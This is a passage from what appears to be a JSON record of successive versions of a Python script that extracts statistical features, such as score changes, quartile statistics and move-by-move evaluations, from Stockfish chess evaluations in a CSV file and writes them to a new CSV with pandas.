'black_35_improve':\n black_35_improve, 'black_40_improve': black_40_improve,\n 'black_45_improve': black_45_improve, 'black_50_improve':\n black_50_improve, 'black_55_improve': black_55_improve,\n 'black_60_improve': black_60_improve, 'black_65_improve':\n black_65_improve, 'black_70_improve': black_70_improve,\n 'black_75_improve': black_75_improve, 'white_q1_max': white_q1_max,\n 'white_q2_max': white_q2_max, 'white_q3_max': white_q3_max,\n 'white_q4_max': white_q4_max, 'black_q1_max': black_q1_max,\n 'black_q2_max': black_q2_max, 'black_q3_max': black_q3_max,\n 'black_q4_max': black_q4_max, 'white_q1_min': white_q1_min,\n 'white_q2_min': white_q2_min, 'white_q3_min': white_q3_min,\n 'white_q4_min': white_q4_min, 'black_q1_min': black_q1_min,\n 'black_q2_min': black_q2_min, 'black_q3_min': black_q3_min,\n 'black_q4_min': black_q4_min, 'white_q1_stdev': white_q1_stdev,\n 'white_q2_stdev': white_q2_stdev, 'white_q3_stdev': white_q3_stdev,\n 'white_q4_stdev': white_q4_stdev, 'black_q1_stdev': black_q1_stdev,\n 'black_q2_stdev': black_q2_stdev, 'black_q3_stdev': black_q3_stdev,\n 'black_q4_stdev': black_q4_stdev, 'game_score10': game_score10,\n 'game_score20': game_score20, 'game_score30': game_score30,\n 'game_score40': game_score40, 'game_score50': 
game_score50,\n 'game_score60': game_score60, 'game_score70': game_score70,\n 'game_score80': game_score80, 'game_score90': game_score90,\n 'game_score100': game_score100}\nchess_df = pd.DataFrame(chess_dict, index=[x for x in range(1, 50001)])\nchess_df.index.name = 'Event'\nchess_df.to_csv('score_features.csv')\n",
"step-4": "import numpy as np\nimport pandas as pd\nraw_scores = [line.strip().split(',')[1].split() for line in open(\n 'stockfish.csv')][1:]\ngame_length = []\naverage_score = []\nscore_stdev = []\nlargest_gain = []\nlargest_drop = []\nmax_score = []\nmin_score = []\nending_score = []\nwhite_avg_improve = []\nblack_avg_improve = []\nwhite_median_improve = []\nblack_median_improve = []\nwhite_q1_improve = []\nwhite_q2_improve = []\nwhite_q3_improve = []\nwhite_q4_improve = []\nblack_q1_improve = []\nblack_q2_improve = []\nblack_q3_improve = []\nblack_q4_improve = []\ngame_score10 = []\ngame_score20 = []\ngame_score30 = []\ngame_score40 = []\ngame_score50 = []\ngame_score60 = []\ngame_score70 = []\ngame_score80 = []\ngame_score90 = []\ngame_score100 = []\nwhite_q1_max = []\nwhite_q2_max = []\nwhite_q3_max = []\nwhite_q4_max = []\nblack_q1_max = []\nblack_q2_max = []\nblack_q3_max = []\nblack_q4_max = []\nwhite_q1_min = []\nwhite_q2_min = []\nwhite_q3_min = []\nwhite_q4_min = []\nblack_q1_min = []\nblack_q2_min = []\nblack_q3_min = []\nblack_q4_min = []\nwhite_q1_stdev = []\nwhite_q2_stdev = []\nwhite_q3_stdev = []\nwhite_q4_stdev = []\nblack_q1_stdev = []\nblack_q2_stdev = []\nblack_q3_stdev = []\nblack_q4_stdev = []\nwhite_5_improve = []\nwhite_10_improve = []\nwhite_15_improve = []\nwhite_20_improve = []\nwhite_25_improve = []\nwhite_30_improve = []\nwhite_35_improve = []\nwhite_40_improve = []\nwhite_45_improve = []\nwhite_50_improve = []\nwhite_55_improve = []\nwhite_60_improve = []\nwhite_65_improve = []\nwhite_70_improve = []\nwhite_75_improve = []\nblack_5_improve = []\nblack_10_improve = []\nblack_15_improve = []\nblack_20_improve = []\nblack_25_improve = []\nblack_30_improve = []\nblack_35_improve = []\nblack_40_improve = []\nblack_45_improve = []\nblack_50_improve = []\nblack_55_improve = []\nblack_60_improve = []\nblack_65_improve = []\nblack_70_improve = []\nblack_75_improve = []\nfor game in raw_scores:\n game_len = len(game) + 1\n total = 0\n prev = None\n player = 1\n max_so_far = -100\n min_so_far = 100\n max_drop = 0\n max_gain = 0\n white_improve = [0]\n black_improve = [0]\n game_nums = [0]\n for score in game:\n if score != 'NA':\n score = int(score)\n game_nums.append(score)\n total += score\n if prev != None:\n change = score - prev\n if change < max_drop:\n max_drop = change\n if change > max_gain:\n max_gain = change\n if player == 1:\n black_improve.append(change)\n else:\n white_improve.append(change)\n player = abs(player - 1)\n prev = score\n if score > max_so_far:\n max_so_far = score\n if score < min_so_far:\n min_so_far = score\n white_avg = sum(white_improve) / (game_len / 2)\n black_avg = sum(black_improve) / (game_len / 2)\n game_length.append(game_len)\n average_score.append(total / game_len)\n score_stdev.append(np.std(np.array(game_nums)))\n largest_gain.append(max_gain)\n largest_drop.append(max_drop)\n max_score.append(max_so_far)\n min_score.append(min_so_far)\n white_avg_improve.append(white_avg)\n black_avg_improve.append(black_avg)\n white_median_improve.append(sorted(white_improve)[len(white_improve) // 2])\n black_median_improve.append(sorted(black_improve)[len(black_improve) // 2])\n white_q1_improve.append(sum(white_improve[0:len(white_improve) // 4]) /\n len(white_improve) // 4)\n white_q2_improve.append(sum(white_improve[len(white_improve) // 4:len(\n white_improve) // 4 * 2]) / len(white_improve) // 4)\n white_q3_improve.append(sum(white_improve[len(white_improve) // 4 * 2:\n len(white_improve) // 4 * 3]) / len(white_improve) // 4)\n 
white_q4_improve.append(sum(white_improve[len(white_improve) // 4 * 3:]\n ) / len(white_improve) // 4)\n black_q1_improve.append(sum(black_improve[0:len(black_improve) // 4]) /\n len(black_improve) // 4)\n black_q2_improve.append(sum(black_improve[len(black_improve) // 4:len(\n black_improve) // 4 * 2]) / len(black_improve) // 4)\n black_q3_improve.append(sum(black_improve[len(black_improve) // 4 * 2:\n len(black_improve) // 4 * 3]) / len(black_improve) // 4)\n black_q4_improve.append(sum(black_improve[len(black_improve) // 4 * 3:]\n ) / len(black_improve) // 4)\n white_q1_max.append(max(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_max.append(max(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_max.append(max(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_max.append(max(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_max.append(max(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_max.append(max(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_max.append(max(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_max.append(max(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_min.append(min(white_improve[0:1 + len(white_improve) // 4]))\n white_q2_min.append(min(white_improve[len(white_improve) // 4:1 + len(\n white_improve) // 4 * 2]))\n white_q3_min.append(min(white_improve[len(white_improve) // 4 * 2:1 + \n len(white_improve) // 4 * 3]))\n white_q4_min.append(min(white_improve[len(white_improve) // 4 * 3:]))\n black_q1_min.append(min(black_improve[0:1 + len(black_improve) // 4]))\n black_q2_min.append(min(black_improve[len(black_improve) // 4:1 + len(\n black_improve) // 4 * 2]))\n black_q3_min.append(min(black_improve[len(black_improve) // 4 * 2:1 + \n len(black_improve) // 4 * 3]))\n black_q4_min.append(min(black_improve[len(black_improve) // 4 * 3:]))\n white_q1_stdev.append(np.std(np.array(white_improve[0:len(white_improve\n ) // 4])))\n white_q2_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4:len(white_improve) // 4 * 2])))\n white_q3_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 2:len(white_improve) // 4 * 3])))\n white_q4_stdev.append(np.std(np.array(white_improve[len(white_improve) //\n 4 * 3:])))\n black_q1_stdev.append(np.std(np.array(black_improve[0:len(black_improve\n ) // 4])))\n black_q2_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4:len(black_improve) // 4 * 2])))\n black_q3_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 2:len(black_improve) // 4 * 3])))\n black_q4_stdev.append(np.std(np.array(black_improve[len(black_improve) //\n 4 * 3:])))\n if len(white_improve) >= 5:\n white_5_improve.append(sum(white_improve[0:5]) / 5)\n else:\n white_5_improve.append(white_avg)\n if len(white_improve) >= 10:\n white_10_improve.append(sum(white_improve[5:10]) / 5)\n else:\n white_10_improve.append(white_avg)\n if len(white_improve) >= 15:\n white_15_improve.append(sum(white_improve[10:15]) / 5)\n else:\n white_15_improve.append(white_avg)\n if len(white_improve) >= 20:\n white_20_improve.append(sum(white_improve[15:20]) / 5)\n else:\n white_20_improve.append(white_avg)\n if len(white_improve) >= 25:\n white_25_improve.append(sum(white_improve[20:25]) / 5)\n else:\n white_25_improve.append(white_avg)\n if len(white_improve) >= 30:\n white_30_improve.append(sum(white_improve[25:30]) / 5)\n else:\n 
white_30_improve.append(white_avg)\n if len(white_improve) >= 35:\n white_35_improve.append(sum(white_improve[30:35]) / 5)\n else:\n white_35_improve.append(white_avg)\n if len(white_improve) >= 40:\n white_40_improve.append(sum(white_improve[35:40]) / 5)\n else:\n white_40_improve.append(white_avg)\n if len(white_improve) >= 45:\n white_45_improve.append(sum(white_improve[40:45]) / 5)\n else:\n white_45_improve.append(white_avg)\n if len(white_improve) >= 50:\n white_50_improve.append(sum(white_improve[45:50]) / 5)\n else:\n white_50_improve.append(white_avg)\n if len(white_improve) >= 55:\n white_55_improve.append(sum(white_improve[50:55]) / 5)\n else:\n white_55_improve.append(white_avg)\n if len(white_improve) >= 60:\n white_60_improve.append(sum(white_improve[55:60]) / 5)\n else:\n white_60_improve.append(white_avg)\n if len(white_improve) >= 65:\n white_65_improve.append(sum(white_improve[60:65]) / 5)\n else:\n white_65_improve.append(white_avg)\n if len(white_improve) >= 70:\n white_70_improve.append(sum(white_improve[65:70]) / 5)\n else:\n white_70_improve.append(white_avg)\n if len(white_improve) >= 75:\n white_75_improve.append(sum(white_improve[70:75]) / 5)\n else:\n white_75_improve.append(white_avg)\n if len(black_improve) >= 5:\n black_5_improve.append(sum(black_improve[0:5]) / 5)\n else:\n black_5_improve.append(black_avg)\n if len(black_improve) >= 10:\n black_10_improve.append(sum(black_improve[5:10]) / 5)\n else:\n black_10_improve.append(black_avg)\n if len(black_improve) >= 15:\n black_15_improve.append(sum(black_improve[10:15]) / 5)\n else:\n black_15_improve.append(black_avg)\n if len(black_improve) >= 20:\n black_20_improve.append(sum(black_improve[15:20]) / 5)\n else:\n black_20_improve.append(black_avg)\n if len(black_improve) >= 25:\n black_25_improve.append(sum(black_improve[20:25]) / 5)\n else:\n black_25_improve.append(black_avg)\n if len(black_improve) >= 30:\n black_30_improve.append(sum(black_improve[25:30]) / 5)\n else:\n black_30_improve.append(black_avg)\n if len(black_improve) >= 35:\n black_35_improve.append(sum(black_improve[30:35]) / 5)\n else:\n black_35_improve.append(black_avg)\n if len(black_improve) >= 40:\n black_40_improve.append(sum(black_improve[35:40]) / 5)\n else:\n black_40_improve.append(black_avg)\n if len(black_improve) >= 45:\n black_45_improve.append(sum(black_improve[40:45]) / 5)\n else:\n black_45_improve.append(black_avg)\n if len(black_improve) >= 50:\n black_50_improve.append(sum(black_improve[45:50]) / 5)\n else:\n black_50_improve.append(black_avg)\n if len(black_improve) >= 55:\n black_55_improve.append(sum(black_improve[50:55]) / 5)\n else:\n black_55_improve.append(black_avg)\n if len(black_improve) >= 60:\n black_60_improve.append(sum(black_improve[55:60]) / 5)\n else:\n black_60_improve.append(black_avg)\n if len(black_improve) >= 65:\n black_65_improve.append(sum(black_improve[60:65]) / 5)\n else:\n black_65_improve.append(black_avg)\n if len(black_improve) >= 70:\n black_70_improve.append(sum(black_improve[65:70]) / 5)\n else:\n black_70_improve.append(black_avg)\n if len(black_improve) >= 75:\n black_75_improve.append(sum(black_improve[70:75]) / 5)\n else:\n black_75_improve.append(black_avg)\n if len(game_nums) > 10:\n game_score10.append(game_nums[10])\n else:\n game_score10.append(0)\n if len(game_nums) > 20:\n game_score20.append(game_nums[20])\n else:\n game_score20.append(0)\n if len(game_nums) > 30:\n game_score30.append(game_nums[30])\n else:\n game_score30.append(0)\n if len(game_nums) > 40:\n 
game_score40.append(game_nums[40])\n else:\n game_score40.append(0)\n if len(game_nums) > 50:\n game_score50.append(game_nums[50])\n else:\n game_score50.append(0)\n if len(game_nums) > 60:\n game_score60.append(game_nums[60])\n else:\n game_score60.append(0)\n if len(game_nums) > 70:\n game_score70.append(game_nums[70])\n else:\n game_score70.append(0)\n if len(game_nums) > 80:\n game_score80.append(game_nums[80])\n else:\n game_score80.append(0)\n if len(game_nums) > 90:\n game_score90.append(game_nums[90])\n else:\n game_score90.append(0)\n if len(game_nums) > 100:\n game_score100.append(game_nums[100])\n else:\n game_score100.append(0)\n if prev:\n ending_score.append(prev)\n else:\n ending_score.append(0)\nchess_dict = {'game_length': game_length, 'average_score': average_score,\n 'score_stdev': score_stdev, 'largest_gain': largest_gain,\n 'largest_drop': largest_drop, 'max_score': max_score, 'min_score':\n min_score, 'ending_score': ending_score, 'white_avg_improve':\n white_avg_improve, 'black_avg_improve': black_avg_improve,\n 'white_median_improve': white_median_improve, 'black_median_improve':\n black_median_improve, 'white_q1_improve': white_q1_improve,\n 'white_q2_improve': white_q2_improve, 'white_q3_improve':\n white_q3_improve, 'white_q4_improve': white_q4_improve,\n 'black_q1_improve': black_q1_improve, 'black_q2_improve':\n black_q2_improve, 'black_q3_improve': black_q3_improve,\n 'black_q4_improve': black_q4_improve, 'white_5_improve':\n white_5_improve, 'white_10_improve': white_10_improve,\n 'white_15_improve': white_15_improve, 'white_20_improve':\n white_20_improve, 'white_25_improve': white_25_improve,\n 'white_30_improve': white_30_improve, 'white_35_improve':\n white_35_improve, 'white_40_improve': white_40_improve,\n 'white_45_improve': white_45_improve, 'white_50_improve':\n white_50_improve, 'white_55_improve': white_55_improve,\n 'white_60_improve': white_60_improve, 'white_65_improve':\n white_65_improve, 'white_70_improve': white_70_improve,\n 'white_75_improve': white_75_improve, 'black_5_improve':\n black_5_improve, 'black_10_improve': black_10_improve,\n 'black_15_improve': black_15_improve, 'black_20_improve':\n black_20_improve, 'black_25_improve': black_25_improve,\n 'black_30_improve': black_30_improve, 'black_35_improve':\n black_35_improve, 'black_40_improve': black_40_improve,\n 'black_45_improve': black_45_improve, 'black_50_improve':\n black_50_improve, 'black_55_improve': black_55_improve,\n 'black_60_improve': black_60_improve, 'black_65_improve':\n black_65_improve, 'black_70_improve': black_70_improve,\n 'black_75_improve': black_75_improve, 'white_q1_max': white_q1_max,\n 'white_q2_max': white_q2_max, 'white_q3_max': white_q3_max,\n 'white_q4_max': white_q4_max, 'black_q1_max': black_q1_max,\n 'black_q2_max': black_q2_max, 'black_q3_max': black_q3_max,\n 'black_q4_max': black_q4_max, 'white_q1_min': white_q1_min,\n 'white_q2_min': white_q2_min, 'white_q3_min': white_q3_min,\n 'white_q4_min': white_q4_min, 'black_q1_min': black_q1_min,\n 'black_q2_min': black_q2_min, 'black_q3_min': black_q3_min,\n 'black_q4_min': black_q4_min, 'white_q1_stdev': white_q1_stdev,\n 'white_q2_stdev': white_q2_stdev, 'white_q3_stdev': white_q3_stdev,\n 'white_q4_stdev': white_q4_stdev, 'black_q1_stdev': black_q1_stdev,\n 'black_q2_stdev': black_q2_stdev, 'black_q3_stdev': black_q3_stdev,\n 'black_q4_stdev': black_q4_stdev, 'game_score10': game_score10,\n 'game_score20': game_score20, 'game_score30': game_score30,\n 'game_score40': game_score40, 'game_score50': 
game_score50,\n 'game_score60': game_score60, 'game_score70': game_score70,\n 'game_score80': game_score80, 'game_score90': game_score90,\n 'game_score100': game_score100}\nchess_df = pd.DataFrame(chess_dict, index=[x for x in range(1, 50001)])\nchess_df.index.name = 'Event'\nchess_df.to_csv('score_features.csv')\n",
"step-5": "#Script to extract features from chess score data file stockfish.csv\nimport numpy as np\nimport pandas as pd\n\n#Load in and format raw chess game scoring data\nraw_scores = [line.strip().split(\",\")[1].split() for line in open(\"stockfish.csv\")][1:]\n\n#Initialize containers for features to extract\ngame_length = []\naverage_score = []\nscore_stdev = []\nlargest_gain = []\nlargest_drop = []\nmax_score = []\nmin_score = []\nending_score = []\nwhite_avg_improve = []\nblack_avg_improve = []\nwhite_median_improve = []\nblack_median_improve = []\nwhite_q1_improve =[]\nwhite_q2_improve =[]\nwhite_q3_improve =[]\nwhite_q4_improve =[]\nblack_q1_improve =[]\nblack_q2_improve =[]\nblack_q3_improve =[]\nblack_q4_improve =[]\n\ngame_score10 = []\ngame_score20 = []\ngame_score30 = []\ngame_score40 = []\ngame_score50 = []\ngame_score60 = []\ngame_score70 = []\ngame_score80 = []\ngame_score90 = []\ngame_score100 = []\n\nwhite_q1_max =[]\nwhite_q2_max =[]\nwhite_q3_max =[]\nwhite_q4_max =[]\nblack_q1_max =[]\nblack_q2_max =[]\nblack_q3_max =[]\nblack_q4_max =[]\n\nwhite_q1_min =[]\nwhite_q2_min =[]\nwhite_q3_min =[]\nwhite_q4_min =[]\nblack_q1_min =[]\nblack_q2_min =[]\nblack_q3_min =[]\nblack_q4_min =[]\n\nwhite_q1_stdev =[]\nwhite_q2_stdev =[]\nwhite_q3_stdev =[]\nwhite_q4_stdev =[]\nblack_q1_stdev =[]\nblack_q2_stdev =[]\nblack_q3_stdev =[]\nblack_q4_stdev =[]\n\nwhite_5_improve = []\nwhite_10_improve = []\nwhite_15_improve = []\nwhite_20_improve = []\nwhite_25_improve = []\nwhite_30_improve = []\nwhite_35_improve = []\nwhite_40_improve = []\nwhite_45_improve = []\nwhite_50_improve = []\nwhite_55_improve = []\nwhite_60_improve = []\nwhite_65_improve = []\nwhite_70_improve = []\nwhite_75_improve = []\n\nblack_5_improve = []\nblack_10_improve = []\nblack_15_improve = []\nblack_20_improve = []\nblack_25_improve = []\nblack_30_improve = []\nblack_35_improve = []\nblack_40_improve = []\nblack_45_improve = []\nblack_50_improve = []\nblack_55_improve = []\nblack_60_improve = []\nblack_65_improve = []\nblack_70_improve = []\nblack_75_improve = []\n\n\n#Loop through game data, calculate and append new features to feature containers\nfor game in raw_scores:\n game_len = len(game)+1 # Add 1 to game length to avoid divide by zero errors caused by empty games\n total = 0\n prev = None\n player = 1\n max_so_far = -100\n min_so_far = 100\n max_drop = 0\n max_gain = 0\n white_improve = [0]\n black_improve = [0]\n game_nums = [0]\n for score in game:\n if score != \"NA\":\n score = int(score)\n game_nums.append(score)\n total+=score\n if prev != None:\n change = score - prev\n if change < max_drop:\n max_drop = change\n if change > max_gain:\n max_gain = change\n if player == 1:\n black_improve.append(change)\n else:\n white_improve.append(change)\n player = abs(player-1)\n prev = score\n if score > max_so_far:\n max_so_far = score\n if score < min_so_far:\n min_so_far = score\n\n #Add computed values to feature containers\n white_avg = sum(white_improve)/(game_len/2)\n black_avg = sum(black_improve)/(game_len/2)\n game_length.append(game_len)\n average_score.append(total/game_len)\n score_stdev.append(np.std(np.array(game_nums)))\n largest_gain.append(max_gain)\n largest_drop.append(max_drop)\n max_score.append(max_so_far)\n min_score.append(min_so_far)\n white_avg_improve.append(white_avg)\n black_avg_improve.append(black_avg)\n white_median_improve.append(sorted(white_improve)[len(white_improve)//2])\n black_median_improve.append(sorted(black_improve)[len(black_improve)//2])\n\n 
white_q1_improve.append( sum(white_improve[0:len(white_improve)//4])/len(white_improve)//4 )\n white_q2_improve.append( sum(white_improve[len(white_improve)//4 : (len(white_improve)//4)*2])/len(white_improve)//4 )\n white_q3_improve.append( sum(white_improve[(len(white_improve)//4)*2 : (len(white_improve)//4)*3])/len(white_improve)//4 )\n white_q4_improve.append( sum(white_improve[(len(white_improve)//4)*3 : ])/len(white_improve)//4 )\n black_q1_improve.append( sum(black_improve[0:len(black_improve)//4])/len(black_improve)//4 )\n black_q2_improve.append( sum(black_improve[len(black_improve)//4 : (len(black_improve)//4)*2])/len(black_improve)//4 )\n black_q3_improve.append( sum(black_improve[(len(black_improve)//4)*2 : (len(black_improve)//4)*3])/len(black_improve)//4 )\n black_q4_improve.append( sum(black_improve[(len(black_improve)//4)*3 : ])/len(black_improve)//4 )\n\n white_q1_max.append(max(white_improve[0:1+len(white_improve)//4]))\n white_q2_max.append(max(white_improve[len(white_improve)//4 : 1+(len(white_improve)//4)*2]))\n white_q3_max.append(max(white_improve[(len(white_improve)//4)*2 : 1+(len(white_improve)//4)*3]))\n white_q4_max.append(max(white_improve[(len(white_improve)//4)*3 : ]))\n black_q1_max.append(max(black_improve[0:1+len(black_improve)//4]))\n black_q2_max.append(max(black_improve[len(black_improve)//4 : 1+(len(black_improve)//4)*2]))\n black_q3_max.append(max(black_improve[(len(black_improve)//4)*2 : 1+(len(black_improve)//4)*3]))\n black_q4_max.append(max(black_improve[(len(black_improve)//4)*3 : ]))\n\n white_q1_min.append(min(white_improve[0:1+len(white_improve)//4]))\n white_q2_min.append(min(white_improve[len(white_improve)//4 : 1+(len(white_improve)//4)*2]))\n white_q3_min.append(min(white_improve[(len(white_improve)//4)*2 : 1+(len(white_improve)//4)*3]))\n white_q4_min.append(min(white_improve[(len(white_improve)//4)*3 : ]))\n black_q1_min.append(min(black_improve[0:1+len(black_improve)//4]))\n black_q2_min.append(min(black_improve[len(black_improve)//4 : 1+(len(black_improve)//4)*2]))\n black_q3_min.append(min(black_improve[(len(black_improve)//4)*2 : 1+(len(black_improve)//4)*3]))\n black_q4_min.append(min(black_improve[(len(black_improve)//4)*3 : ]))\n\n white_q1_stdev.append(np.std(np.array((white_improve[0:len(white_improve)//4]))))\n white_q2_stdev.append(np.std(np.array((white_improve[len(white_improve)//4 : (len(white_improve)//4)*2]))))\n white_q3_stdev.append(np.std(np.array((white_improve[(len(white_improve)//4)*2 : (len(white_improve)//4)*3]))))\n white_q4_stdev.append(np.std(np.array((white_improve[(len(white_improve)//4)*3 : ]))))\n black_q1_stdev.append(np.std(np.array((black_improve[0:len(black_improve)//4]))))\n black_q2_stdev.append(np.std(np.array((black_improve[len(black_improve)//4 : (len(black_improve)//4)*2]))))\n black_q3_stdev.append(np.std(np.array((black_improve[(len(black_improve)//4)*2 : (len(black_improve)//4)*3]))))\n black_q4_stdev.append(np.std(np.array((black_improve[(len(black_improve)//4)*3 : ]))))\n\n if len(white_improve) >=5:\n white_5_improve.append( sum(white_improve[0:5])/5 )\n else:\n white_5_improve.append(white_avg)\n if len(white_improve) >=10:\n white_10_improve.append( sum(white_improve[5:10])/5 )\n else:\n white_10_improve.append(white_avg)\n if len(white_improve) >=15:\n white_15_improve.append( sum(white_improve[10:15])/5 )\n else:\n white_15_improve.append(white_avg)\n if len(white_improve) >=20:\n white_20_improve.append( sum(white_improve[15:20])/5 )\n else:\n white_20_improve.append(white_avg)\n if 
len(white_improve) >=25:\n white_25_improve.append( sum(white_improve[20:25])/5 )\n else:\n white_25_improve.append(white_avg)\n if len(white_improve) >=30:\n white_30_improve.append( sum(white_improve[25:30])/5 )\n else:\n white_30_improve.append(white_avg)\n if len(white_improve) >=35:\n white_35_improve.append( sum(white_improve[30:35])/5 )\n else:\n white_35_improve.append(white_avg)\n if len(white_improve) >=40:\n white_40_improve.append( sum(white_improve[35:40])/5 )\n else:\n white_40_improve.append(white_avg)\n if len(white_improve) >=45:\n white_45_improve.append( sum(white_improve[40:45])/5 )\n else:\n white_45_improve.append(white_avg)\n if len(white_improve) >=50:\n white_50_improve.append( sum(white_improve[45:50])/5 )\n else:\n white_50_improve.append(white_avg)\n if len(white_improve) >=55:\n white_55_improve.append( sum(white_improve[50:55])/5 )\n else:\n white_55_improve.append(white_avg)\n if len(white_improve) >=60:\n white_60_improve.append( sum(white_improve[55:60])/5 )\n else:\n white_60_improve.append(white_avg)\n if len(white_improve) >=65:\n white_65_improve.append( sum(white_improve[60:65])/5 )\n else:\n white_65_improve.append(white_avg)\n if len(white_improve) >=70:\n white_70_improve.append( sum(white_improve[65:70])/5 )\n else:\n white_70_improve.append(white_avg)\n if len(white_improve) >=75:\n white_75_improve.append( sum(white_improve[70:75])/5 )\n else:\n white_75_improve.append(white_avg)\n\n if len(black_improve) >=5:\n black_5_improve.append( sum(black_improve[0:5])/5 )\n else:\n black_5_improve.append(black_avg)\n if len(black_improve) >=10:\n black_10_improve.append( sum(black_improve[5:10])/5 )\n else:\n black_10_improve.append(black_avg)\n if len(black_improve) >=15:\n black_15_improve.append( sum(black_improve[10:15])/5 )\n else:\n black_15_improve.append(black_avg)\n if len(black_improve) >=20:\n black_20_improve.append( sum(black_improve[15:20])/5 )\n else:\n black_20_improve.append(black_avg)\n if len(black_improve) >=25:\n black_25_improve.append( sum(black_improve[20:25])/5 )\n else:\n black_25_improve.append(black_avg)\n if len(black_improve) >=30:\n black_30_improve.append( sum(black_improve[25:30])/5 )\n else:\n black_30_improve.append(black_avg)\n if len(black_improve) >=35:\n black_35_improve.append( sum(black_improve[30:35])/5 )\n else:\n black_35_improve.append(black_avg)\n if len(black_improve) >=40:\n black_40_improve.append( sum(black_improve[35:40])/5 )\n else:\n black_40_improve.append(black_avg)\n if len(black_improve) >=45:\n black_45_improve.append( sum(black_improve[40:45])/5 )\n else:\n black_45_improve.append(black_avg)\n if len(black_improve) >=50:\n black_50_improve.append( sum(black_improve[45:50])/5 )\n else:\n black_50_improve.append(black_avg)\n if len(black_improve) >=55:\n black_55_improve.append( sum(black_improve[50:55])/5 )\n else:\n black_55_improve.append(black_avg)\n if len(black_improve) >=60:\n black_60_improve.append( sum(black_improve[55:60])/5 )\n else:\n black_60_improve.append(black_avg)\n if len(black_improve) >=65:\n black_65_improve.append( sum(black_improve[60:65])/5 )\n else:\n black_65_improve.append(black_avg)\n if len(black_improve) >=70:\n black_70_improve.append( sum(black_improve[65:70])/5 )\n else:\n black_70_improve.append(black_avg)\n if len(black_improve) >=75:\n black_75_improve.append( sum(black_improve[70:75])/5 )\n else:\n black_75_improve.append(black_avg)\n\n if len(game_nums)>10:\n game_score10.append(game_nums[10])\n else:\n game_score10.append(0)\n if len(game_nums)>20:\n 
game_score20.append(game_nums[20])\n else:\n game_score20.append(0)\n if len(game_nums)>30:\n game_score30.append(game_nums[30])\n else:\n game_score30.append(0)\n if len(game_nums)>40:\n game_score40.append(game_nums[40])\n else:\n game_score40.append(0)\n if len(game_nums)>50:\n game_score50.append(game_nums[50])\n else:\n game_score50.append(0)\n if len(game_nums)>60:\n game_score60.append(game_nums[60])\n else:\n game_score60.append(0)\n if len(game_nums)>70:\n game_score70.append(game_nums[70])\n else:\n game_score70.append(0)\n if len(game_nums)>80:\n game_score80.append(game_nums[80])\n else:\n game_score80.append(0)\n if len(game_nums)>90:\n game_score90.append(game_nums[90])\n else:\n game_score90.append(0)\n if len(game_nums)>100:\n game_score100.append(game_nums[100])\n else:\n game_score100.append(0)\n\n if prev:\n ending_score.append(prev)\n else:\n ending_score.append(0)\n\nchess_dict = {\"game_length\":game_length,\"average_score\":average_score,\"score_stdev\":score_stdev,\"largest_gain\":largest_gain,\n \"largest_drop\":largest_drop,\"max_score\":max_score,\"min_score\":min_score,\n \"ending_score\":ending_score, \"white_avg_improve\":white_avg_improve,\n \"black_avg_improve\":black_avg_improve,\"white_median_improve\":white_median_improve,\n \"black_median_improve\":black_median_improve,\"white_q1_improve\":white_q1_improve,\n \"white_q2_improve\":white_q2_improve,\n \"white_q3_improve\":white_q3_improve,\n \"white_q4_improve\":white_q4_improve,\"black_q1_improve\":black_q1_improve,\n \"black_q2_improve\":black_q2_improve,\n \"black_q3_improve\":black_q3_improve,\n \"black_q4_improve\":black_q4_improve,\n 'white_5_improve': white_5_improve,\n 'white_10_improve': white_10_improve,\n 'white_15_improve': white_15_improve,\n 'white_20_improve': white_20_improve,\n 'white_25_improve': white_25_improve,\n 'white_30_improve': white_30_improve,\n 'white_35_improve': white_35_improve,\n 'white_40_improve': white_40_improve,\n 'white_45_improve': white_45_improve,\n 'white_50_improve': white_50_improve,\n 'white_55_improve': white_55_improve,\n 'white_60_improve': white_60_improve,\n 'white_65_improve': white_65_improve,\n 'white_70_improve': white_70_improve,\n 'white_75_improve': white_75_improve,\n 'black_5_improve': black_5_improve,\n 'black_10_improve': black_10_improve,\n 'black_15_improve': black_15_improve,\n 'black_20_improve': black_20_improve,\n 'black_25_improve': black_25_improve,\n 'black_30_improve': black_30_improve,\n 'black_35_improve': black_35_improve,\n 'black_40_improve': black_40_improve,\n 'black_45_improve': black_45_improve,\n 'black_50_improve': black_50_improve,\n 'black_55_improve': black_55_improve,\n 'black_60_improve': black_60_improve,\n 'black_65_improve': black_65_improve,\n 'black_70_improve': black_70_improve,\n 'black_75_improve': black_75_improve,\n\n 'white_q1_max': white_q1_max,\n 'white_q2_max': white_q2_max,\n 'white_q3_max': white_q3_max,\n 'white_q4_max': white_q4_max,\n 'black_q1_max': black_q1_max,\n 'black_q2_max': black_q2_max,\n 'black_q3_max': black_q3_max,\n 'black_q4_max': black_q4_max,\n\n 'white_q1_min': white_q1_min,\n 'white_q2_min': white_q2_min,\n 'white_q3_min': white_q3_min,\n 'white_q4_min': white_q4_min,\n 'black_q1_min': black_q1_min,\n 'black_q2_min': black_q2_min,\n 'black_q3_min': black_q3_min,\n 'black_q4_min': black_q4_min,\n\n 'white_q1_stdev': white_q1_stdev,\n 'white_q2_stdev': white_q2_stdev,\n 'white_q3_stdev': white_q3_stdev,\n 'white_q4_stdev': white_q4_stdev,\n 'black_q1_stdev': black_q1_stdev,\n 
'black_q2_stdev': black_q2_stdev,\n 'black_q3_stdev': black_q3_stdev,\n 'black_q4_stdev': black_q4_stdev,\n\n 'game_score10':game_score10,\n 'game_score20':game_score20,\n 'game_score30':game_score30,\n 'game_score40':game_score40,\n 'game_score50':game_score50,\n 'game_score60':game_score60,\n 'game_score70':game_score70,\n 'game_score80':game_score80,\n 'game_score90':game_score90,\n 'game_score100':game_score100\n}\n\n#Create feature data frame\nchess_df = pd.DataFrame(chess_dict, index=[x for x in range(1,50001)])\nchess_df.index.name = \"Event\"\n\n#Write the new feature data frame to CSV\nchess_df.to_csv(\"score_features.csv\")\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
